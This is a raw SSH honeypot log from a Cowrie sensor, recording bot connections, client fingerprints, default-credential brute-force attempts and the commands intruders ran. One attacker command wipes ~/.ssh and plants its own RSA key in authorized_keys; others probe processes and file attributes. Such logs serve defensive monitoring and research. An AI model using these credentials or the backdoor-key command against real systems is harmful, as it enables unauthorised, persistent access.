{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-24T21:23:42.941133Z","src_ip":"41.74.123.23","session":"d0bd9e736333"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-24T21:23:43.744535Z","src_ip":"41.74.123.23","session":"d0bd9e736333"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:44.929643Z","src_ip":"41.74.123.23","session":"d0bd9e736333"}
{"eventid":"cowrie.session.connect","src_ip":"41.74.123.23","src_port":42857,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5e19752a3df","protocol":"ssh","message":"New connection: 41.74.123.23:42857 (1.2.3.4:22) [session: c5e19752a3df]","sensor":"my-vps","timestamp":"2025-08-24T21:23:45.112517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-24T21:23:45.115062Z","src_ip":"41.74.123.23","session":"c5e19752a3df"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-24T21:23:45.298881Z","src_ip":"41.74.123.23","session":"c5e19752a3df"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-24T21:23:46.120333Z","src_ip":"41.74.123.23","session":"c5e19752a3df"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:47.348931Z","src_ip":"41.74.123.23","session":"c5e19752a3df"}
{"eventid":"cowrie.session.connect","src_ip":"41.74.123.23","src_port":43140,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd61fceef277","protocol":"ssh","message":"New connection: 41.74.123.23:43140 (1.2.3.4:22) [session: dd61fceef277]","sensor":"my-vps","timestamp":"2025-08-24T21:23:47.529781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-24T21:23:47.531230Z","src_ip":"41.74.123.23","session":"dd61fceef277"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-24T21:23:47.718762Z","src_ip":"41.74.123.23","session":"dd61fceef277"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:23:48.708902Z","src_ip":"41.74.123.23","session":"dd61fceef277"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:48.890853Z","src_ip":"41.74.123.23","session":"dd61fceef277"}
{"eventid":"cowrie.session.connect","src_ip":"167.160.161.37","src_port":44080,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1a954a4bb8f","protocol":"ssh","message":"New connection: 167.160.161.37:44080 (1.2.3.4:22) [session: b1a954a4bb8f]","sensor":"my-vps","timestamp":"2025-08-24T21:23:49.276034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T21:23:49.276994Z","src_ip":"167.160.161.37","session":"b1a954a4bb8f"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-24T21:23:49.322838Z","src_ip":"167.160.161.37","session":"b1a954a4bb8f"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:23:49.469729Z","src_ip":"167.160.161.37","session":"b1a954a4bb8f"}
{"eventid":"cowrie.client.size","width":40,"height":80,"message":"Terminal Size: 40 80","sensor":"my-vps","timestamp":"2025-08-24T21:23:49.578321Z","src_ip":"167.160.161.37","session":"b1a954a4bb8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:23:49.626292Z","src_ip":"167.160.161.37","session":"b1a954a4bb8f"}
{"eventid":"cowrie.command.input","input":"echo \"cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps\" | sh","message":"CMD: echo \"cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps\" | sh","sensor":"my-vps","timestamp":"2025-08-24T21:23:49.679190Z","src_ip":"167.160.161.37","session":"b1a954a4bb8f"}
{"eventid":"cowrie.command.input","input":"cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps\n","message":"CMD: cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps\n","sensor":"my-vps","timestamp":"2025-08-24T21:23:49.680674Z","src_ip":"167.160.161.37","session":"b1a954a4bb8f"}
{"eventid":"cowrie.command.failed","input":"curl2","message":"Command not found: curl2","sensor":"my-vps","timestamp":"2025-08-24T21:23:49.682699Z","src_ip":"167.160.161.37","session":"b1a954a4bb8f"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-24T21:23:49.690947Z","src_ip":"167.160.161.37","session":"b1a954a4bb8f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9269a7f1bb32625f5b43fb851d2d3d6be7475e32b4303dea7359e723750b90c5","size":3931,"shasum":"9269a7f1bb32625f5b43fb851d2d3d6be7475e32b4303dea7359e723750b90c5","duplicate":false,"duration":"5.1","message":"Closing TTY Log: var/lib/cowrie/tty/9269a7f1bb32625f5b43fb851d2d3d6be7475e32b4303dea7359e723750b90c5 after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:54.678421Z","src_ip":"167.160.161.37","session":"b1a954a4bb8f"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:23:54.680043Z","src_ip":"167.160.161.37","session":"b1a954a4bb8f"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:24:35.968056Z","src_ip":"60.221.239.232","session":"f86ec0702f86"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.5.21","src_port":40064,"dst_ip":"1.2.3.4","dst_port":22,"session":"677d11ca1acb","protocol":"ssh","message":"New connection: 43.156.5.21:40064 (1.2.3.4:22) [session: 677d11ca1acb]","sensor":"my-vps","timestamp":"2025-08-24T21:24:37.704807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:24:37.705737Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:24:37.950490Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.login.success","username":"root","password":"jesus100","message":"login attempt [root/jesus100] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:24:38.968680Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:24:39.540925Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:24:39.541590Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:24:39.542597Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:24:39.788496Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:24:40.352128Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:24:40.352996Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":34362,"dst_ip":"1.2.3.4","dst_port":22,"session":"066361bf5686","protocol":"ssh","message":"New connection: 129.226.183.73:34362 (1.2.3.4:22) [session: 066361bf5686]","sensor":"my-vps","timestamp":"2025-08-24T21:24:40.409891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:24:40.415562Z","src_ip":"129.226.183.73","session":"066361bf5686"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:24:40.599700Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:24:40.600639Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:24:40.675500Z","src_ip":"129.226.183.73","session":"066361bf5686"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.5.21","src_port":40078,"dst_ip":"1.2.3.4","dst_port":22,"session":"87cf8d0b8e23","protocol":"ssh","message":"New connection: 43.156.5.21:40078 (1.2.3.4:22) [session: 87cf8d0b8e23]","sensor":"my-vps","timestamp":"2025-08-24T21:24:40.852157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:24:40.853006Z","src_ip":"43.156.5.21","session":"87cf8d0b8e23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:24:41.106438Z","src_ip":"43.156.5.21","session":"87cf8d0b8e23"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-24T21:24:41.702627Z","src_ip":"129.226.183.73","session":"066361bf5686"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:24:42.160171Z","src_ip":"43.156.5.21","session":"87cf8d0b8e23"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:24:42.962784Z","src_ip":"129.226.183.73","session":"066361bf5686"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:24:43.416044Z","src_ip":"43.156.5.21","session":"87cf8d0b8e23"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.5.21","src_port":40084,"dst_ip":"1.2.3.4","dst_port":22,"session":"844e0d10ade9","protocol":"ssh","message":"New connection: 43.156.5.21:40084 (1.2.3.4:22) [session: 844e0d10ade9]","sensor":"my-vps","timestamp":"2025-08-24T21:24:43.667912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:24:43.668682Z","src_ip":"43.156.5.21","session":"844e0d10ade9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:24:43.921312Z","src_ip":"43.156.5.21","session":"844e0d10ade9"}
